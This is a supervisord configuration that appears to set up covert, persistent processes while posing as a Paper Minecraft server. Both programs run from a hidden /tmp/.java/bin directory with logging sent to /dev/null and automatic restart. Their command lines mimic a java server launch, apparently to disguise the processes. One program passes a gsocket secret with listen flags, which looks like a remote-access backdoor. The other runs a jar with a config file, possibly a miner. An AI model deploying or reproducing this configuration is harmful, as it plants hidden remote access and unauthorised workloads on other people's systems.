[supervisord]
logfile=/dev/null

[program:app]
directory=/tmp/.java/bin
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -DPaper.IgnoreJavaVersion=true -jar server.jar' ./paper.jar -c ./conf.json
stdout_logfile=/dev/null
autorestart = true

[program:gnet]
directory=/tmp/.java/bin
environment=GSOCKET_ARGS="-s i6C7A0e9A2c-0A6f3D9g4H7bJ7-5C4F9e1-C9F0d6A2-k8A1C5J1g7 -liq"
command=./patch.jar -a 'java -Xms128M -XX:MaxRAMPercentage=95.0 -Dterminal.jline=false -Dterminal.ansi=true -DPaper.IgnoreJavaVersion=true -jar server.jar' ./add-on.jar 
stdout_logfile=/dev/null
autorestart = true